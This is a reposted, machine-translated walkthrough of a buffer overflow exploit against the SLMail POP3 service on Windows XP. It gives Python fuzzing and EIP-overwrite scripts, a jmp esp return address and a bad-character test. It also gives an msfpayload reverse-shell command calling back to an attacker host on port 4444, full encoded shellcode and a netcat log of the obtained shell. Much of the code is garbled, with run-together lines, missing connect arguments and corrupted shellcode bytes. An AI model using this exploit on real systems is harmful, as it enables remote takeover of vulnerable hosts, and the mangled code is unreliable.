Windows buffer overflow 01/16 Update SLTechnology News&Howtos

Windows buffer overflow

2025-01-16 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)06/01 Report--

I don't write much with advice.

Prepare the environment:

Attack plane: Kali 2.0 target machine: windows xp, windows2003 can not do this experiment, the test has not been successful many times. If you are interested, you can try the software: SLMail, immunity debugger, mona.py can leave a message if you need the software.

Overall steps:

1. Test for buffer overflow 2. Find the critical point of the location of the buffer overflow and verify 3. Find the fixed allocation of modules in the system, where there is jmp esp, in order to achieve jump 4. 5. Write the address found in 3 places at the location found by 2, that is, the process from eip to jmp esp. This process sets breakpoints to verify whether the jump was successful. To determine which bad characters there are, each service may not be the same 6. Generate a shellcode and send it. 7. Complete Step 1. Use python script to test the POP3 connected to windows and start the POP3 service of windows

Use python script tests to connect

#! / usr/bin/python import socket s=socket.socket (socket.AF_INET,socket.SOCK_STREAM) try: print "\ nSending veil buffer..." s.connect ('10.10.10.19' ) data=s.recv (1024) print data s.send ('USER test\ r\ n') data=s.recv (1024) print data s.send (' PASS test\ r\ n') data=s.recv (1024) print data s.close () print "\ nDone!" except: print "\ nFailed to connect pop3"

Running result:

Root@kal:/test#. / 01.py

Sending veil buffer... + OK POP3 server example.com ready -ERR unable to lock mailboxDone!

It indicates that the connection to POP3 is successful.

Step2. Test whether a buffer overflow will occur in compliance

The windows side needs to open the slmail service with immunity debugger

Open immunity = > File = = > Attach = > Select the line below

Click the Attach in the lower right corner, and then start running. At runtime, the pause in the lower right corner will become running.

Run the following script at this point:

#! / usr/bin/pythonimport socketbuffer = ["A"] counter = 100while len (buffer) jmp esp00000000 FFE4 jmp esp

Input hexadecimal requires the addition of\ x. Then the first one is used as jmp esp.

Double-click the first jmp esp you look up, and you can see that the address is 5F4A358F

Step 6 Test Jump

Then the above address sets the breakpoint

Send the following script:

#! / usr/bin/pythonimport socketbuffer = "A" * 900 + "\ x8f\ x35\ x4a\ x5f" + "C" * 2606 # enter the above address backwards. S=socket.socket (socket.AF_INET,socket.SOCK_STREAM) try: print "\ nSending veil buffer..." S.connect data=s.recv (1024) s.send ('USER test\ r\ n') s.send (' PASS'+ buffer +'\ r\ n') data=s.recv (1024) s.close () print "\ nDone!" except: print "\ nFailed to connect pop3"

Start the service and send the script

The lower right corner will show execution to the breakpoint, stop

Press F7 to step in at this time

You can see that you have jumped to esp, which contains 43, that is, C.

It means the jump was successful.

Step 7 judges bad characters

Restart the service.

Write the following script''

#! / usr/bin/python

Import sockets=socket.socket (socket.AF_INET Socket.SOCK_STREAM) badchar= ("\ x01\ x02\ x03\ x04\ x05\ x06\ x07\ x08\ x09\ x0a\ x0c\ x0d\ x0f\ x10"\ x11\ x12\ x13\ x15\ x16\ x18\ x19\ x21\ x1b\ x1c\ x24\ x25\ x26\ x27\ x28\ x2a\ x2b\ x2c\ x2d\ x2f\ x30 "\ x31\ x32\ x33\ x34 X35\ x36\ x37\ x38\ x39\ x3a\ x3c\ x3d\ x3e\ x3f\ x40 "\ x41\ x42\ x44\ x45\ x46\ x47\ x48\ x49\ x4a\ x4c\ x4d\ x4e\ x50"\ x51\ x52\ x53\ x55\ x56\ 57\ x58\ x59\ x5a\ x5c\ x5d\ x5e\ x5f\ x60 "\ x61\ x62\ x63\ x65\ x66\ x68\ x69\ x6a\ x6c\ x6d X6e\ x6f\ x70 "\ x71\ x72\ x73\ x74\ x75\ x76\ x77\ x78\ x7a\ x7b\ x7d\ x7e\ x7f\ x80"\ x81\ x82\ x83\ x84\ x85\ x87\ x88\ x89\ x8a\ x8b\ x8d\ x8e\ x8f\ x90"\ x91\ x92\ x93\ x94\ x95\ x96\ x98\ x9a\ x9a\ X9c\ X9d\ X9d\ X9f xa0"\ xa1\ xa3\ xa4\ xa5 Xa6\ xa7\ xa8\ xa9\ xaa\ xab\ xac\ xad\ xae\ xaf\ xb0 "\ xb1\ xb2\ xb3\ xb4\ xb5\ xb6\ xb7\ xb8\ xb9\ xba\ xbb\ xbc\ xbd\ xbe\ xbf\ xc0"\ xc1\ xc2\ xc3\ xc4\ xc5\ xc6\ xc7\ xc8\ xc9\ xca\ xca\ xcb\ xcb "\ xcb\ xcc\ xcb\ xca\ Xdf\ xe0 ""\ xe1\ xe2\ xe3\ xe4\ xe5\ xe6\ xe7\ xe8\ xe9\ xea\ xeb\ xec\ xed\ xee\ xef\ xf0 "\ xf1\ xf2\ xf3\ xf4\ xf5\ xf7\ xf8\ xf9\ xfa\ xfb\ xfc\ xfd\ xfe\ xff\ X00" buffer= "A" * 2606 + "B" * 4+badchartry: s.connect (('10.10.10.12') Data=s.recv (1024) s.send ('USER test'+'\ r\ n') data=s.recv (1024) s.send (' PASS'+ buffer+'\ r\ n') s.close () print "\ nDone" print "\ nSending veil buffer..." except: print "Fail connect target"

Send a script on the windows side

From the picture above, you can see that the characters in 0x0a are missing, and the characters after that are also missing, so let's change the 0x0a and send it again.

As you can see, after we kick out 0a, the following string can be displayed, indicating that 0a is a bad character. \ x0d is not displayed either, and\ x00

So you find three bad characters, 0x00 0x0D 0x0A.

Step 8 Construction shellcode

Construct rebound shell

Root@kal:/usr/share/framework2#. / msfpayload win32_reverse LHOST=10.10.10.11 LPORT=4444 R |. / msfencode-b "\ x0d\ X00\ x0a" [*] Using Msf::Encoder::PexFnstenvMov with final size of 310 bytes "\ x6a\ x48\ x59\ xd9\ xee\ xd9\ x74\ x24\ xf4\ x5b\ x81\ x73\ x13\ x0f\ x2a\ x32".\ x60\ x83\ xeb\ xfc\ xf4\ xf3\ X40\ xd9\ xe7\ xd3\ xcd \ x9f\ xf0\ x4a "."\ xb9\ X0c\ x2b\ X0e\ xb9\ X25\ x33\ xa1\ x4e\ x65\ x77\ xdd\ xeb\ x40\ x32 "."\ xb9\ X3f\ X2f\ xd9\ x29\ x84\ x1e\ xb9\ x61\ xe1\ xf2\ xf9\ xa3\ xae "."\ xf2\ x14\ x08\ xeb xf8\ x6d\ X0e\ xe8\ xd9\ x94\ X34\ x7e\ x16\ x48\ x7a xcf ". \ x2b\ xd9\ x84\ x26\ x79\ xeb\ x50\ x36\ x33\ x8b\ x0c\ x06 "."\ xb9\ xe9\ x63\ X0e\ X2e\ X01\ xcc\ x1b\ xe9\ x04\ x69\ x02\ xeb\ x4f\ x26 "."\ xb9\ x10\ x13\ x87\ xb9\ x20\ x07\ x5a\ xee\ x41\ x24\ xde\ X30\ xf0\ xfc. "\ x54\ x33\ x69\ x42\ x01\ x52\ x67\ x5d\ x41\ x52 X50\ x7e\ xcd\ xb0\ x67\ xe1 "."\ xdf\ x9c\ x34\ x7a\ xcd\ xb6\ x50\ xa3\ xd7\ X06\ x8e\ xc7\ x3a\ x62\ x5a\ x40 "."\ x30\ x9f\ xdf\ x42\ xeb\ x69\ xfa\ x87\ x9f\ xd9\ x79\ x61\ x5c\ x69. "\ x61\ x23\ x5c\ xd5\ xe2\ x05\ x20\ x38\ x6b\ x69\ x42\ x23. Xbb\ x81\ x9a\ x42\ xde\ x99\ xa5\ x4a\ x65\ x9f\ xd9\ X40\ X22\ x31\ x5a\ xd5 "."\ xe2\ x06\ x65\ x4e\ x54\ x08\ x6c\ x47\ x58\ x56\ xfe\ xe9\ xe8\ x40 "."\ x76\ xe9\ xed\ X1b\ xf2\ x93\ xa5\ xbf\ X9d\ xf1\ x68\ X1f\ X9e\ X4d\ X06. "\ xbf\ x1a\ x37\ x81\ xcb\ x67\ x58". \ xcc\ xd3\ x19\ xd5\ x47\ x48\ xf0\ xfc "."\ x69\ x37\ x5d\ x7b\ x63\ x31\ x65\ x2b\ x63\ x31\ x5a\ x7b\ xcd\ xb0\ x67\ x87 "."\ xeb\ x65\ xc1\ x79\ xcd\ xb6\ x65\ xcd\ x57\ xfa\ x87\ x76\ xec. "\ x4b\ X9f\ x7a\ x2e\ xcd xb6\ xf0\ X5d\ xce\ X9f\ xdf\ X42 xc2\ xea\ x0b X75 "."\ x61\ x9f\ xd9\ xd5\ xe2\ x60 "

Write a script:

#! / usr/bin/pythonimport socketshellcode= "\ x6a\ x48\ x59\ xd9\ xee\ xd9\ x74\ x24\ xf4\ x5b\ x81\ x13\ x13\ X0f\ X32\ x60\ xeb\ xfc\ xe2\ xf4\ xf3\ xd9\ x2d\ xe7\ xd3\ xcd\ X9f\ xf0\ xb9\ X0e\ xb9\ X25\ X33\ xa1\ X65\ x77\ x2b\ xdd xeb\ X40\ X32\ xb9\ X3f\ x2f\ X2b\ xd9\ x29\ x84 \ x1e\ xb9\ x61\ xe1\ x1b\ xf2\ xf9\ xa3\ xae\ xf2\ x14\ x08\ xeb\ xf8\ x6d\ X0e\ xe8\ xd9\ x94\ x34\ x7e\ x16\ x48\ x7a\ xb9\ X3f\ x2b\ xd9\ x06\ x84\ x79\ xeb\ x36\ x33\ x8b\ X0c\ X06\ xb9 xe9\ x63\ x0e\ X2e\ X01\ xcc\ x1b\ xe9\ x84\ x69\ x02\ xeb\ X4f\ x26\ xb9\ x13 \ x87\ xb9\ x20\ x07\ x74\ x5a\ xee\ X41\ x24\ xde\ X30\ xf0\ x54\ x33\ x69\ x42\ x52\ x67\ x5d\ x41\ x52\ X7e\ xcd\ xb0\ x67\ xe1\ x9c\ x34\ x7a\ xcd\ x50\ xa3\ xd7\ X06\ X8e\ xc7\ x62a\ x5a\ x40\ X30\ X9f\ xdf\ X42\ xeb\ x69\ xfa\ x87\ x65\ xd9\ x61\ x5c \ x69\ x61\ x23\ x5c\ xd5\ xe2\ x08\ x05\ x20\ x38\ x6b\ x69\ x42\ x3c\ xbb\ x81\ x9a\ x42\ xde\ x99\ xa5\ x6a\ x65\ x9f\ xd9\ x40\ x31\ x5a\ xd5\ x06\ x65\ x4e\ x54\ x08\ x6c\ x47\ x58\ x30\ X56\ X03\ xe9\ xe8\ x76\ xe9\ xed\ x1b\ xf2\ x93\ xa5\ xbf\ x9d\ xf1 \ x68\ x1f\ x9e\ x4d\ x06\ xbf\ X37\ x81\ x99\ xcb\ x67\ X58\ xcc\ xd3\ x19\ xd5\ x47\ x48\ xf0\ xfc\ x69\ x37\ x5d\ x7b\ x63\ x31\ x2b\ x63\ x31a\ x7b\ xcd\ x67\ x87\ xeb\ x65\ x79\ xcd\ xb6\ x65\ xd5\ xcd\ X57 xf0\ xfa\ X5A\ x76\ xec\ x4b\ X9f\ x7a\ x2e\ xcd\ xf0\ \ x5d\ xce\ x9f\ xdf\ X42\ xc2\ xea\ x0b\ x75\ x61\ x9f\ xd9\ xd5\ xe2\ x60 "buffer =" A "* 2606 +"\ x8f\ x35\ x4a\ x5f "+"\ x90 "* 9 + shellcodes=socket.socket (socket.AF_INET) Socket.SOCK_STREAM) try: print "\ nSending veil buffer..." S.connect data=s.recv (1024) s.send ('USER test\ r\ n') s.send (' PASS'+ buffer +'\ r\ n') data=s.recv (1024) s.close () print "\ nDone!" except: print "\ nFailed to connect pop3"

The above\ x90 stands for NOP and is not executed to prevent subsequent shellcode from missing the first few bytes for other reasons.

Open the windows service, listen on port 4444 with kali, then send a script to get a bounce shell.

Root@kal:/test# nc-lvp 4444listening on [any] 4444... ^ [A ^ [[B10.10.10.19: inverse host lookup failed: Unknown hostconnect to [10.10.10.11] from (UNKNOWN) [10.10.10.19] 1158Microsoft Windows XP [Linfen 5.1.2600] (C) get the shell from 1985-2001 Microsoft Corp.C:\ Program Files\ SLmail\ System > #

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.